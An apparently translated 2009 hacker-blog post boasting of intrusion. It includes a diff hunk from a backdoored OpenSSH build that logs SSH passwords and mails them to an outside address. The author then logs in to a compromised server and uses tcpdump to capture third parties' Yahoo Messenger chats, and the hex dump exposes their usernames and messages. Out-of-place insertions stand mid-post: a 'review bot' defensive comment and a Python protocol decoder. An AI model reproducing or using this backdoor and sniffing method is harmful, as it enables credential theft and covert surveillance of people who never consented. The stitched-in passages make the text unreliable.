Posted by kecoak on Apr 16, 2009

Tcpdump for kIdz

What is tcpdump?
tcpdump is a Linux program that captures the stream of packet data passing through eth0, eth1 and so on, which is more commonly known as network sniffing.
Ok, a bit of experience sharing.
Yesterday, when I checked my email, there were already several logs in from the backdoored port 22 OpenSSH 4.7p1 that I had infected onto a server I'd rooted. How that backdooring is done has already been explained here by the old hands..hehehe 😀

//logs di file
+ if((f=fopen(LOGZ,"a"))!=NULL){
+ fprintf(f,"user:[email protected] --> %s:%s@%sn",authctxt->server_user,password,authctxt->host);
+ fclose(f);
+ }
+ //kirim ke server pake curl/mail terserah
+ //example pake 'mailx'
+ snprintf(logz,sizeof(logz),"tail -1 %s|mailx -s "[owned user]new fucked user" [cencored]@live.com",LOGZ);
+ system(logz);
...
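Review bot: the fopen(LOGZ,"a") / fprintf / fclose sequence and the system(logz) call are the observable footprint of this hunk, and the defender's point is that both are host-level artifacts: a file at the LOGZ path that grows on every authentication, and a shell plus mailx child process spawned from the sshd process each time the block runs. Integrity checking of the sshd binary against the package manifest, file-change monitoring on the LOGZ location, and process-execution auditing (sshd should never be a parent of sh or mailx) are the checks that would surface exactly these lines in operation.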

As you can see from the script above, every time someone makes an ssh connection from that server, whether outbound or to localhost,
it is automatically sent to my email 😀
Ok, first step:
I log in to the server from those sniffed logins,
straight away:

[email protected]:/# cat etc/hosts

127.0.0.1       localhost server0
xx.xxx.xx.xxx   rahasia.deh.id

#client customer
192.168.90.4     client1
192.168.90.10    client2
192.168.90.15    client3
192.168.90.51    client4
192.168.90.22    client5
192.168.90.201   client6

Wow..looks like an internet café server..or an office, dunno..^^
Then I looked at its traffic; turns out iftop isn't there, they use Nload.
hmm..

[email protected]:/# uname -a;cat etc/issue
Linux ds6471 2.6.22-8-server #1 SMP Thu Jul 12 16:28:57 GMT 2007 i686 GNU/Linux
Ubuntu 6.06 LTS n l

They're on Ubuntu..:D, no hanging about, straight away:

[email protected]:/#apt-get install iftop

okay, it's installed

[email protected]:/#iftop -i eth1 -F 192.168.90.10/32

12.5Kb          25.0Kb          37.5Kb          50.0Kb    62.5Kb
+-------------------------------------------------------------------------------
192.168.90.10             <=> bs2.ads.vip.tpc.yahoo.com  5.25Kb  4.03Kb  2.99Kb
192.168.90.10             <=> tx-in-f113.google.com      3.66Kb  4.02Kb  4.22Kb
192.168.90.10             <=> ns3.turbodns.co.uk          748b   1.29Kb   983b
192.168.90.10             <=> 194.14.236.50              1.22Kb   250b    267b
192.168.90.10             <=> server6614.dedicated.webf     0b    188b     67b
192.168.90.10             <=> ds6488.dedicated.turbodns     0b    188b     67b
192.168.90.10             <=> raucousdns.co.uk              0b    188b     67b
192.168.90.10             <=> ad1.vip.rm.jp1.yahoo.net      0b    188b     67b
192.168.90.10             <=> server6485.dedicated.webf     0b    188b     67b
192.168.90.10             <=> in2.msg.vip.mud.yahoo.com    94kb   188b     67b
192.168.90.10             <=> server6542.dedicated.webf     0b    141b     50b
192.168.90.10             <=> server6437.dedicated.webf     0b    125b    132b
192.168.90.10             <=> 239.255.2.2                   0b     36b     13b
192.168.90.10             <=> server6577.dedicated.webf     0b      0b     67b
192.168.90.10             <=> server6636.dedicated.webf    90kb     0b     67b
192.168.90.10             <=> server6542.dedicated.webf     0b      0b     67b
192.168.90.10             <=> server6643.dedicated.webf     0b      0b     65b

--------------------------------------------------------------------------------
TX:             cumm:  64.4KB   peak:   3.08Kb  rates:   10.8Kb  1.72Kb  1.32Kb
RX:                    57.4KB           3.08Kb           12.6Kb  1.81Kb   904b
TOTAL:                  122KB           5.42Kb           114Kb  3.54Kb  2.21Kb

Ok, there's a lot of traffic to
here I'll try to sniff the Yahoo Messenger conversation.

[email protected]:/#tcpdump -n -f -s 0 -X -vvv -i eth1 port 5050 and host 192.168.90.10 >>log.txt
tcpdump: listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes

[email protected]:~# ls -lia
total 80
1196084 drwxr-xr-x  7 root root  4096 Apr 16 10:47 .
1179916 drwxr-xr-x 19 root root 32768 Apr 15 07:47 ..
1459192 drwx------  2 root root  4096 Feb  7 05:30 .aptitude
1202658 -rw-------  1 root root  4480 Apr 16 10:47 .bash_history
1198732 -rw-r--r--  1 root root  2227 Oct 13  2005 .bashrc
1441948 drwxr-xr-x  5 root root  4096 Jan  7 15:05 .cpan
1427211 drwxr-xr-x  3 root root  4096 Apr 15 20:00 .mc
1461933 drwxr-xr-x  4 root root  4096 Apr 16 02:28 .msf3
1198731 -rw-r--r--  1 root root   141 Oct 13  2005 .profile
1427701 drwx------  2 root root  4096 Apr 15 01:04 .ssh
1197166 -rw-r--r--  1 root root  5642 Apr 16 10:47 log.txt
[email protected]:~#vi log.txt
04:38:19.084903 IP (tos 0x0, ttl  48, id 19232, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.12.mmcc > 192.168.90.10.spice: ., cksum 0xebfd (correct), 1186:1186(0) ack 1906 win 65535
0x0000:  4500 0028 4b20 4000 3006 d7ce 44b4 d90c  E..([email protected]...
0x0010:  0a00 0021 13ba 0783 cadb 4578 4b27 253d  ...!......ExK'%=
0x0020:  5010 ffff ebfd 0000                      P.......
04:38:19.088461 IP (tos 0x0, ttl  50, id 48894, offset 0, flags [DF], proto: TCP (6), length: 197) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: P, cksum 0x2ad7 (correct), 251:408(157) ack 697 win 65535
0x0000:  4500 00c5 befe 4000 3206 6159 44b4 d906  [email protected]...
0x0010:  0a00 0021 13ba 044f 9c67 1abb 16f7 4f35  ...!...O.g....O5
0x0020:  5018 ffff 2ad7 0000 594d 5347 0010 0000  P...*...YMSG....
0x0030:  0089 0006 0000 0001 005a 514e 34c0 8064  .........ZQN4..d
0x0040:  696b 7375 6b6d 61c0 8030 c080 6469 6b73  iksukma..0..diks
0x0050:  756b 6d61 c080 31c0 8064 696b 7375 6b6d  ukma..1..indra_ram
0x0060:  61c0 8035 c080 6e61 7277 6173 7475 5f65  a..5.......
0x0070:  6b61 c080 3134 c080 4c68 6120 4d6f 6d20  ka..14..Lha.Mom.
0x0080:  6a67 206e 7461 7220 6c6f 7720 6472 6f70  jg.ntar.low.drop
0x0090:  2e2e 6269 6b69 6e20 7174 6132 2067 726f  ..bikin.qta2.gro
0x00a0:  6279 616b 616e 2064 6527 c080 3633 c080  byakan.de'..63..
0x00b0:  3b30 c080 3634 c080 30c0 8031 3030 3933  ;0..64..0..10093
0x00c0:  c080 34c0 80                             ..4..
04:38:19.281253 IP (tos 0x0, ttl 127, id 58814, offset 0, flags [DF], proto: TCP (6), length: 40) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: ., cksum 0x566e (correct), 697:697(0) ack 408 win 64405
0x0000:  4500 0028 e5be 4000 7f06 ee35 0a00 0021  E..([email protected]...!
0x0010:  44b4 d906 044f 13ba 16f7 4f35 9c67 1b58  D....O....O5.g.X
0x0020:  5010 fb95 566e 0000 0000 0000 0000       P...Vn........
04:38:27.311007 IP (tos 0x0, ttl 127, id 59642, offset 0, flags [DF], proto: TCP (6), length: 116) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0xa725 (correct), 697:773(76) ack 408 win 64405
0x0000:  4500 0074 e8fa 4000 7f06 eaad 0a00 0021  E..t..@........!
0x0010:  44b4 d906 044f 13ba 16f7 4f35 9c67 1b58  D....O....O5.g.X
0x0020:  5018 fb95 a725 0000 594d 5347 0010 0000  P....%..YMSG....
0x0030:  0038 004b 0000 0016 005a 514e 3439 c080  .8.K.....ZQN49..
0x0040:  5459 5049 4e47 c080 31c0 806e 6172 7761  TYPING..1..nnina
0x0050:  7374 755f 656b 61c0 8031 34c0 8020 c080  _dewi..14.....
0x0060:  3133 c080 31c0 8035 c080 6469 6b73 756b  13..1..5..indra_ra
0x0070:  6d61 c080                                ma..
04:38:27.656225 IP (tos 0x0, ttl  50, id 25872, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x51b8 (correct), 408:408(0) ack 773 win 65535
0x0000:  4500 0028 6510 4000 3206 bbe4 44b4 d906  E..([email protected]...
0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 4f81  ...!...O.g.X..O.
0x0020:  5010 ffff 51b8 0000                      P...Q...
04:38:27.935586 IP (tos 0x0, ttl 127, id 59670, offset 0, flags [DF], proto: TCP (6), length: 116) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0xa725 (correct), 697:773(76) ack 408 win 64405
0x0000:  4500 0074 e916 4000 7f06 ea91 0a00 0021  E..t..@........!
0x0010:  44b4 d906 044f 13ba 16f7 4f35 9c67 1b58  D....O....O5.g.X
0x0020:  5018 fb95 a725 0000 594d 5347 0010 0000  P....%..YMSG....
0x0030:  0038 004b 0000 0016 005a 514e 3439 c080  .8.K.....ZQN49..
0x0040:  5459 5049 4e47 c080 31c0 806e 6172 7761  TYPING..1..
0x0050:  7374 755f 656b 61c0 8031 34c0 8020 c080  ..14.....
0x0060:  3133 c080 31c0 8035 c080 6469 6b73 756b  13..1..5..indra_ra
0x0070:  6d61 c080                                ma..
04:38:28.145719 IP (tos 0x0, ttl  50, id 32447, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x51b8 (correct), 408:408(0) ack 773 win 65535
0x0000:  4500 0028 7ebf 4000 3206 a235 44b4 d906  E..([email protected]...
0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 4f81  ...!...O.g.X..O.
0x0020:  5010 ffff 51b8 0000                      P...Q...
04:38:30.059920 IP (tos 0x0, ttl 127, id 59763, offset 0, flags [DF], proto: TCP (6), length: 77) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0x9d0a (correct), 773:810(37) ack 408 win 64405
0x0000:  4500 004d e973 4000 7f06 ea5b 0a00 0021  E..M.s@....[...!
0x0010:  44b4 d906 044f 13ba 16f7 4f81 9c67 1b58  D....O....O..g.X
0x0020:  5018 fb95 9d0a 0000 594d 5347 0010 0000  P.......YMSG....
0x0030:  0011 008a 0000 0000 005a 514e 30c0 806e  .........ZQN0..n
0x0040:  6172 7761 7374 755f 656b 61c0 80         nina_dewi..
04:38:30.371870 IP (tos 0x0, ttl  50, id 60817, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x5193 (correct), 408:408(0) ack 810 win 65535
0x0000:  4500 0028 ed91 4000 3206 3363 44b4 d906  E..([email protected]...
0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 4fa6  ...!...O.g.X..O.
0x0020:  5010 ffff 5193 0000                      P...Q...
04:38:38.347798 IP (tos 0x0, ttl 127, id 59995, offset 0, flags [DF], proto: TCP (6), length: 146) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0x0704 (correct), 810:916(106) ack 408 win 64405
0x0000:  4500 0092 ea5b 4000 7f06 e92e 0a00 0021  E....[@........!
0x0010:  44b4 d906 044f 13ba 16f7 4fa6 9c67 1b58  D....O....O..g.X
0x0020:  5018 fb95 0704 0000 594d 5347 0010 0000  P.......YMSG....
0x0030:  0056 0006 5a55 aa56 005a 514e 31c0 806e  .V..ZU.V.ZQN1..n
0x0040:  6172 7761 7374 755f 656b 61c0 8035 c080  nina_dewi..5..
0x0050:  6469 6b73 756b 6d61 c080 3937 c080 31c0  indra_rama..97..1.
0x0060:  8036 33c0 803b 30c0 8036 34c0 8030 c080  .63..;0..64..0..
0x0070:  3230 36c0 8031 c080 3134 c080 6472 7064  206..1..14..drpd
0x0080:  2041 2720 7967 2064 726f 7020 6861 796f  .A'.yg.drop.hayo
0x0090:  c080                                     ..
04:38:38.663087 IP (tos 0x0, ttl  50, id 36364, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x5129 (correct), 408:408(0) ack 916 win 65535
0x0000:  4500 0028 8e0c 4000 3206 92e8 44b4 d906  E..([email protected]...
0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 5010  ...!...O.g.X..P.
0x0020:  5010 ffff 5129 0000                      P...Q)..
04:38:38.675807 IP (tos 0x0, ttl 127, id 60002, offset 0, flags [DF], proto: TCP (6), length: 192) 192.168.90.10.adobeserver-2 > 68.180.217.6.mmcc: P, cksum 0xf909 (correct), 916:1068(152) ack 408 win 64405
0x0000:  4500 00c0 ea62 4000 7f06 e8f9 0a00 0021  E....b@........!
0x0010:  44b4 d906 044f 13ba 16f7 5010 9c67 1b58  D....O....P..g.X
0x0020:  5018 fb95 f909 0000 594d 5347 0010 0000  P.......YMSG....
0x0030:  0038 004b 0000 0016 005a 514e 3439 c080  .8.K.....ZQN49..
0x0040:  5459 5049 4e47 c080 31c0 806e 6172 7761  TYPING..1..
0x0050:  7374 755f 656b 61c0 8031 34c0 8020 c080  dewi_eka..14.....
0x0060:  3133 c080 30c0 8035 c080 6469 6b73 756b  13..0..5..indra_ra
0x0070:  6d61 c080 594d 5347 0010 0000 0038 004b  ma..YMSG.....8.K
0x0080:  0000 0016 005a 514e 3439 c080 5459 5049  .....ZQN49..TYPI
0x0090:  4e47 c080 31c0 806e 6172 7761 7374 755f  NG..1..anak_
0x00a0:  656b 61c0 8031 34c0 8020 c080 3133 c080  ilang..14.....13..
0x00b0:  30c0 8035 c080 6469 6b73 756b 6d61 c080  0..5..indra_rama..
04:38:38.987713 IP (tos 0x0, ttl  50, id 40636, offset 0, flags [DF], proto: TCP (6), length: 40) 68.180.217.6.mmcc > 192.168.90.10.adobeserver-2: ., cksum 0x5091 (correct), 408:408(0) ack 1068 win 65535
0x0000:  4500 0028 9ebc 4000 3206 8238 44b4 d906  E..([email protected]...
0x0010:  0a00 0021 13ba 044f 9c67 1b58 16f7 50a8  ...!...O.g.X..P.
0x0020:  5010 ffff 5091 0000                      P...P...

Yep, we've logged their conversation..
Now, how to sniff passwords and other important data?
There are many different ways…
From here you can develop it yourself..
for things like pop3, smtp, etc..
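To make concrete what a capture like the one above exposes, here is an added YMSG frame decoder, written for this edit and not part of the original post, run on constructed sample frames rather than the post's bytes. The header layout, the service numbers (6 and 75) and the field keys match what is visible in the hex dump (header `YMSG 0010 0000 <len> <service> <status> <session>`, then key/value pairs separated by `c0 80`); the key-name labels are an assumption taken from the commonly documented YMSG field numbering.

```python
import struct

# YMSG v16 layout as seen in the capture: 20-byte header, then key/value pairs
# separated by c0 80. Service and key names are an assumption from the commonly
# documented YMSG field numbers; only the two services present in the post are listed.
SERVICES = {0x06: "MESSAGE", 0x4B: "NOTIFY"}
KEYS = {"1": "from", "5": "to", "13": "typing", "14": "message", "49": "notify_type"}
SEP = b"\xc0\x80"
HEADER = struct.Struct(">4sHHHHII")  # magic, version, vendor, length, service, status, session

def parse_ymsg(frame: bytes) -> dict:
    """Decode one YMSG frame; raise ValueError on a short or malformed frame."""
    if len(frame) < HEADER.size:
        raise ValueError("frame shorter than the 20-byte YMSG header")
    magic, version, _vendor, length, service, status, session = HEADER.unpack_from(frame)
    if magic != b"YMSG":
        raise ValueError("missing YMSG magic")
    body = frame[HEADER.size:HEADER.size + length]
    if len(body) != length:
        raise ValueError(f"truncated payload: header says {length}, got {len(body)}")
    parts = body.split(SEP)
    if parts.pop() != b"" or len(parts) % 2:  # body must be c080-terminated pairs
        raise ValueError("payload is not a c080-terminated list of key/value pairs")
    fields = {KEYS.get(k.decode("ascii"), "key" + k.decode("ascii")): v.decode("utf-8", "replace")
              for k, v in zip(parts[::2], parts[1::2])}
    return {"version": version, "service": SERVICES.get(service, hex(service)),
            "status": status, "session": session, "fields": fields}

def is_malformed(frame: bytes) -> bool:
    """True when parse_ymsg rejects the frame (exercises the length and magic checks)."""
    try:
        parse_ymsg(frame)
    except ValueError:
        return True
    return False

def build_ymsg(service: int, status: int, session: int, pairs: list) -> bytes:
    """Build a frame for the constructed samples below (demonstration only)."""
    body = b"".join(k.encode() + SEP + v.encode() + SEP for k, v in pairs)
    return HEADER.pack(b"YMSG", 0x10, 0, len(body), service, status, session) + body

# Constructed samples, not the post's bytes: one chat message, one typing notification.
SAMPLE_MESSAGE = build_ymsg(0x06, 1, 0x1234ABCD, [("1", "alice"), ("5", "bob"), ("14", "meeting at 4?")])
SAMPLE_TYPING = build_ymsg(0x4B, 0x16, 0x1234ABCD,
                           [("49", "TYPING"), ("1", "bob"), ("14", " "), ("13", "1"), ("5", "alice")])
```

Every field, including the message text, is visible without any decryption, which is why a monitoring tool or IDS can classify this traffic on port 5050 from the payload alone. Frames can also sit back-to-back in one TCP segment (as in the 04:38:38.675807 packet above); feeding `frame[20 + length:]` back into parse_ymsg walks to the next one.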

Cheers,
Xsniffer


3 Responses to “Tcpdump for kIdz”

  1. CyberTank says:

    try having a look around here: http://www.pcapr.net

  2. hitsal says:

    Wow, cool to have a backdoor on a server.
    So SSH, which is supposed to be secure telnet, is no use after all. 😀

  3. black h0le says:

    just lurking for now
